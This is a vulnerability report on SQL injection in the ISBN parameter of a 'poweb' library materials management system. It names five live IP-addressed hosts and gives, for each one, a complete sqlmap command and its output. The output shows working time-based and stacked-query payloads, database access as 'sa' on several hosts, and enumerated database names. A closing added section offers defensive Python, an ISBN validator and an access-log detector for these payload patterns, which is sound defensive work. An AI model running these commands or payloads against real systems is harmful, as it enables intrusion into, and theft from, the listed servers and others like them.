### Brief description:

A non-book materials management system has a generic SQL injection vulnerability.

### Details:

Injection point: the ISBN parameter.

http://202.206.242.26:88/poweb/requestiso.do?status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5&SSH=
http://202.197.107.11:8080/poweb/requestiso.do?status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5&SSH=
http://210.32.205.51:8080/poweb/requestiso.do?status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5&SSH=
http://166.111.120.132/poweb/requestiso.do?status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5&SSH=
http://211.67.182.137:8080/poweb/requestiso.do?status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5&SSH=

1. http://202.206.242.26:88/poweb/requestiso.do?status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5&SSH=

```
sqlmap.py -u "http://202.206.242.26:88/poweb/requestiso.do?status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5&SSH=" -p "ISBN" --dbs --current-user --current-db
```

```
sqlmap identified the following injection points with a total of 124 HTTP(s) requests:
---
Place: GET
Parameter: ISBN
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5'; WAITFOR DELAY '0:0:5';--&SSH=

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5' WAITFOR DELAY '0:0:5'--&SSH=
---
[08:37:18] [INFO] testing MySQL
[08:37:18] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries
[08:37:18] [WARNING] the back-end DBMS is not MySQL
[08:37:18] [INFO] testing Oracle
[08:37:18] [WARNING] the back-end DBMS is not Oracle
[08:37:18] [INFO] testing PostgreSQL
[08:37:18] [WARNING] the back-end DBMS is not PostgreSQL
[08:37:18] [INFO] testing Microsoft SQL Server
[08:37:28] [INFO] confirming Microsoft SQL Server
[08:37:49] [INFO] adjusting time delay to 1 second due to good response times
[08:37:49] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005
[08:37:49] [INFO] fetching current user
[08:37:49] [INFO] retrieved: sa
current user:    'sa'
[08:38:06] [INFO] fetching current database
[08:38:06] [INFO] retrieved: proone
current database:    'proone'
[08:39:16] [INFO] fetching database names
[08:39:16] [INFO] fetching number of databases
[08:39:16] [INFO] retrieved: 5
[08:39:23] [INFO] retrieved: master
[08:40:22] [INFO] retrieved: model
[08:41:17] [INFO] retrieved: msdb
[08:41:58] [INFO] retrieved: proone
[08:43:13] [INFO] retrieved: tempdb
available databases [5]:
[*] [proone\x03]
[*] master
[*] model
[*] msdb
[*] tempdb
```

2. http://202.197.107.11:8080/poweb/requestiso.do?status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5&SSH=

```
sqlmap.py -u "http://202.197.107.11:8080/poweb/requestiso.do?status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5&SSH=" -p "ISBN" --dbs --current-user --current-db
```

```
sqlmap identified the following injection points with a total of 126 HTTP(s) requests:
---
Place: GET
Parameter: ISBN
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5'; WAITFOR DELAY '0:0:5';--&SSH=

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5' WAITFOR DELAY '0:0:5'--&SSH=
---
[09:42:21] [INFO] testing MySQL
[09:42:21] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries
[09:42:38] [WARNING] the back-end DBMS is not MySQL
[09:42:38] [INFO] testing Oracle
[09:42:55] [WARNING] the back-end DBMS is not Oracle
[09:42:55] [INFO] testing PostgreSQL
[09:43:12] [WARNING] the back-end DBMS is not PostgreSQL
[09:43:12] [INFO] testing Microsoft SQL Server
[09:43:39] [INFO] confirming Microsoft SQL Server
[09:44:39] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2000
[09:44:39] [INFO] fetching current user
[09:44:39] [INFO] retrieved: 
[09:45:06] [INFO] adjusting time delay to 4 seconds due to good response times
sa1
current user:    'sa1'
[09:54:25] [INFO] fetching current database
[09:54:25] [INFO] retrieved: proon
[10:11:41] [ERROR] invalid character detected. retrying..
[10:11:41] [WARNING] increasing time delay to 5 seconds
e11
current database:    'proone11'
[10:21:31] [INFO] fetching database names
[10:21:31] [INFO] fetching number of databases
[10:21:31] [INFO] retrieved: 12
[10:25:24] [INFO] retrieved: CDT
[10:36:29] [ERROR] invalid character detected. retrying..
[10:36:29] [WARNING] increasing time delay to 6 seconds
owe
[10:48:58] [ERROR] invalid character detected. retrying..
[10:48:58] [WARNING] increasing time delay to 7 seconds
r_CHS
[11:06:25] [INFO] retrieved: idl40
[11:24:37] [INFO] retrieved: idltt
[11:43:03] [INFO] retrieved: master
[12:03:40] [INFO] retrieved: model
[12:21:43] [INFO] retrieved: msdb
[12:36:06] [INFO] retrieved: Northwind
[13:07:36] [INFO] retrieved: proone
[13:29:33] [INFO] retrieved: proone11
[13:56:52] [INFO] retrieved: proone28
[14:25:12] [INFO] retrieved: pubs
[14:40:08] [INFO] retrieved: tempdb
available databases [12]:
[*] CDTower_CHS
[*] idl40
[*] idltt
[*] master
[*] model
[*] msdb
[*] Northwind
[*] proone
[*] proone11
[*] proone28
[*] pubs
[*] tempdb
```

3. http://210.32.205.51:8080/poweb/requestiso.do?status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5&SSH=

```
sqlmap.py -u "http://210.32.205.51:8080/poweb/requestiso.do?status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5&SSH=" -p "ISBN" --dbs --current-user --current-db
```

```
sqlmap identified the following injection points with a total of 103 HTTP(s) requests:
---
Place: GET
Parameter: ISBN
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5'; WAITFOR DELAY '0:0:5';--&SSH=

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5' WAITFOR DELAY '0:0:5'--&SSH=
---
[11:03:46] [INFO] testing MySQL
[11:03:46] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries
[11:03:51] [WARNING] the back-end DBMS is not MySQL
[11:03:51] [INFO] testing Oracle
[11:03:56] [WARNING] the back-end DBMS is not Oracle
[11:03:56] [INFO] testing PostgreSQL
[11:04:01] [WARNING] the back-end DBMS is not PostgreSQL
[11:04:01] [INFO] testing Microsoft SQL Server
[11:04:15] [INFO] confirming Microsoft SQL Server
[11:04:51] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005
[11:04:52] [INFO] fetching current user
[11:04:52] [INFO] retrieved: 
[11:05:56] [INFO] adjusting time delay to 4 seconds due to good response times
p
[11:06:40] [INFO] adjusting time delay to 3 seconds due to good response times
roone
current user:    'proone'
[11:12:26] [INFO] fetching current database
[11:12:26] [INFO] retrieved: prooneproone
current database:    'prooneproone'
[11:26:17] [INFO] fetching database names
[11:26:17] [INFO] fetching number of databases
[11:26:17] [INFO] retrieved: 6
[11:27:14] [INFO] retrieved: master
[11:33:57] [INFO] retrieved: model
[11:39:58] [INFO] retrieved: msdb
[11:44:36] [INFO] retrieved: proone
[11:52:01] [INFO] retrieved: prooneproone
[12:05:58] [INFO] retrieved: tempdb
available databases [6]:
[*] master
[*] model
[*] msdb
[*] proone
[*] prooneproone
[*] tempdb
```

4. http://166.111.120.132/poweb/requestiso.do?status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5&SSH=

```
sqlmap.py -u "http://166.111.120.132/poweb/requestiso.do?status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5&SSH=" -p "ISBN" --dbs --current-user --current-db
```

```
sqlmap identified the following injection points with a total of 103 HTTP(s) requests:
---
Place: GET
Parameter: ISBN
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5'; WAITFOR DELAY '0:0:5';--&SSH=

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5' WAITFOR DELAY '0:0:5'--&SSH=
---
[16:17:24] [INFO] testing MySQL
[16:17:24] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries
[16:17:29] [WARNING] the back-end DBMS is not MySQL
[16:17:29] [INFO] testing Oracle
[16:17:34] [WARNING] the back-end DBMS is not Oracle
[16:17:34] [INFO] testing PostgreSQL
[16:17:39] [WARNING] the back-end DBMS is not PostgreSQL
[16:17:39] [INFO] testing Microsoft SQL Server
[16:17:53] [INFO] confirming Microsoft SQL Server
[16:18:31] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005
[16:18:31] [INFO] fetching current user
[16:18:31] [INFO] retrieved: sa
current user:    'sa\x03'
[16:22:41] [INFO] fetching current database
[16:22:41] [INFO] retrieved: proone
current database:    'proone'
[16:32:21] [INFO] fetching database names
[16:32:21] [INFO] fetching number of databases
[16:32:21] [INFO] retrieved: 6
[16:33:30] [INFO] retrieved: cadal
[16:41:25] [INFO] retrieved: master
[16:51:17] [INFO] retrieved: model
[16:59:06] [INFO] retrieved: 
[17:00:51] [ERROR] invalid character detected. retrying..
[17:00:51] [WARNING] increasing time delay to 6 seconds
msdb
[17:08:21] [INFO] retrieved: proone
[17:18:53] [INFO] retrieved: te
[17:23:43] [ERROR] invalid character detected. retrying..
[17:23:43] [WARNING] increasing time delay to 7 seconds
mpdb
available databases [6]:
[*] [cadal\x03]
[*] [master\x19]
[*] [msdb\x02]
[*] model
[*] proone
[*] tempdb
```

5. http://211.67.182.137:8080/poweb/requestiso.do?status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5&SSH=

```
sqlmap.py -u "http://211.67.182.137:8080/poweb/requestiso.do?status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5&SSH=" -p "ISBN" --dbs --current-user --current-db
```

```
sqlmap identified the following injection points with a total of 102 HTTP(s) requests:
---
Place: GET
Parameter: ISBN
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5'; WAITFOR DELAY '0:0:5';--&SSH=

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: status=insert&METAID=7578&PropertyID=&ISBN=7-112-06320-5' WAITFOR DELAY '0:0:5'--&SSH=
---
[16:55:36] [INFO] testing MySQL
[16:55:36] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries
[16:55:53] [WARNING] the back-end DBMS is not MySQL
[16:55:53] [INFO] testing Oracle
[16:56:10] [WARNING] the back-end DBMS is not Oracle
[16:56:10] [INFO] testing PostgreSQL
[16:56:27] [WARNING] the back-end DBMS is not PostgreSQL
[16:56:27] [INFO] testing Microsoft SQL Server
[16:56:54] [INFO] confirming Microsoft SQL Server
[16:57:54] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2000
[16:57:54] [INFO] fetching current user
[16:57:54] [INFO] retrieved: 
[16:58:21] [INFO] adjusting time delay to 4 seconds due to good response times
sa
current user:    'sa'
[17:05:10] [INFO] fetching current database
[17:05:10] [INFO] retrieved: proone
current database:    'proone'
[17:24:17] [INFO] fetching database names
[17:24:17] [INFO] fetching number of databases
[17:24:18] [INFO] retrieved: 9
[17:26:56] [INFO] retrieved: cxbook
[17:45:46] [INFO] retrieved: Dservices
[18:12:08] [INFO] retrieved: ma
[18:20:17] [ERROR] invalid character detected. retrying..
[18:20:17] [WARNING] increasing time delay to 5 seconds
s
[18:26:22] [ERROR] invalid character detected. retrying..
[18:26:22] [WARNING] increasing time delay to 6 seconds
t
[18:32:48] [ERROR] invalid character detected. retrying..
[18:32:48] [WARNING] increasing time delay to 7 seconds
er
[18:40:51] [INFO] retrieved: model
[18:59:01] [INFO] retrieved: msd
[19:11:37] [ERROR] invalid character detected. retrying..
[19:11:37] [WARNING] increasing time delay to 8 seconds
b
[19:16:38] [INFO] retrieved: N
[19:23:34] [ERROR] invalid character detected. retrying..
[19:23:34] [WARNING] increasing time delay to 9 seconds
orthwind
[19:54:29] [INFO] retrieved: 
[19:58:34] [ERROR] unable to properly validate last character value ('p')..
proone
[20:15:05] [INFO] retrieved: pubs
[20:28:41] [INFO] retrieved: tempdb
available databases [9]:
[*] cxbook
[*] Dservices
[*] master
[*] model
[*] msdb
[*] Northwind
[*] proone
[*] pubs
[*] tempdb
```

### Proof of vulnerability:

Proven.
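The report shows the same pattern on every host: the ISBN value is accepted as free text, so a single quote followed by `WAITFOR DELAY` or a stacked `';--` reaches Microsoft SQL Server, in several cases under the `sa` login. Two defender-side checks follow as an added example; this is not code from the original report or from the affected product, and since the application is JSP the checks are written in Python only so that they run stand-alone. The first is a strict allow-list validator for the ISBN parameter (shape plus check digit), which is the input-side control that should sit in front of any query the endpoint builds, with a parameterised query behind it. The second scans web-server access-log lines for the payload shapes quoted in the sqlmap output, so a scan of this kind becomes visible in monitoring. The log lines, client addresses and timestamps are constructed for illustration, and the assumed log layout is the Combined Log Format as written by Tomcat's AccessLogValve.

```python
"""Added example, not part of the original report or the affected product.

1. is_valid_isbn(): allow-list check for the ISBN request parameter.
2. scan_access_log(): flags access-log lines whose ISBN value carries the
   payload shapes shown in the report (time-based 'WAITFOR DELAY' probes and
   stacked queries terminated with ';--'), or is simply not a valid ISBN.
All log lines below are constructed for this example.
"""
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

_ISBN10 = re.compile(r"^\d{9}[\dX]$")
_ISBN13 = re.compile(r"^\d{13}$")


def is_valid_isbn(raw: str) -> bool:
    """True only for a checksum-valid ISBN-10 or ISBN-13 with optional hyphens/spaces.

    Anything else (quotes, semicolons, SQL keywords, over-long input) is rejected
    before it can reach a query string.
    """
    if len(raw) > 17:  # 13 digits plus 4 hyphens is the longest legitimate form
        return False
    s = raw.replace("-", "").replace(" ", "").upper()
    if _ISBN10.match(s):
        # ISBN-10: weights 10..1, 'X' stands for 10, sum must be divisible by 11
        total = sum((10 - i) * (10 if c == "X" else int(c)) for i, c in enumerate(s))
        return total % 11 == 0
    if _ISBN13.match(s):
        # ISBN-13: alternating weights 1,3 over all 13 digits, sum divisible by 10
        total = sum((1 if i % 2 == 0 else 3) * int(c) for i, c in enumerate(s))
        return total % 10 == 0
    return False


# Payload shapes taken from the sqlmap output above; matched after URL decoding.
_SQLI_PATTERNS = [
    ("mssql-time-based", re.compile(r"WAITFOR\s+DELAY", re.IGNORECASE)),
    ("stacked-query", re.compile(r"'\s*;.*--")),
]

# Combined Log Format (assumed layout; Tomcat AccessLogValve "%h %l %u %t \"%r\" %s %b").
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


def inspect_access_log_line(line: str) -> Optional[Dict]:
    """Return a finding dict for a suspicious request, or None if the line is clean."""
    m = _LOG_RE.match(line)
    if not m:
        return None
    params = parse_qs(urlsplit(m["target"]).query)
    isbn = params.get("ISBN", [""])[0]  # parse_qs already percent-decodes the value
    findings = [name for name, pat in _SQLI_PATTERNS if pat.search(isbn)]
    if not findings and not is_valid_isbn(isbn):
        findings.append("malformed-isbn")
    if not findings:
        return None
    return {"ip": m["ip"], "ts": m["ts"], "isbn": isbn, "findings": findings}


def scan_access_log(lines: List[str]) -> List[Dict]:
    """Run inspect_access_log_line over a log and keep only the flagged entries."""
    return [f for f in (inspect_access_log_line(l) for l in lines) if f is not None]


# Constructed sample log: one legitimate lookup, the two sqlmap payload shapes from
# the report (URL-encoded as a client would send them), and a mistyped ISBN.
CONSTRUCTED_LOG = [
    '10.0.0.5 - - [01/Jan/2000:08:37:18 +0800] "GET /poweb/requestiso.do?status=insert'
    '&METAID=7578&PropertyID=&ISBN=7-112-06320-5&SSH= HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2000:08:37:20 +0800] "GET /poweb/requestiso.do?status=insert'
    '&METAID=7578&PropertyID=&ISBN=7-112-06320-5%27%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--'
    '&SSH= HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2000:08:37:26 +0800] "GET /poweb/requestiso.do?status=insert'
    '&METAID=7578&PropertyID=&ISBN=7-112-06320-5%27%20WAITFOR%20DELAY%20%270%3A0%3A5%27--'
    '&SSH= HTTP/1.1" 200 512',
    '10.0.0.7 - - [01/Jan/2000:08:38:01 +0800] "GET /poweb/requestiso.do?status=insert'
    '&METAID=7578&PropertyID=&ISBN=7-112-06320-9&SSH= HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for hit in scan_access_log(CONSTRUCTED_LOG):
        print(hit["ip"], hit["ts"], hit["findings"], repr(hit["isbn"]))
```

The validator deliberately accepts only a checksum-valid ISBN, which is a tighter rule than "no quotes": the ISBN on the page (7-112-06320-5) passes, every payload in the sqlmap output fails on length alone, and a typo such as 7-112-06320-9 is rejected as well. The detector pairs a signature match with that same validator so that a probe which does not contain `WAITFOR` still surfaces as a malformed ISBN; the six-to-nine second delays visible in the report's timestamps are the other signal to alert on, since a time-based blind scan produces hundreds of slow requests against one parameter.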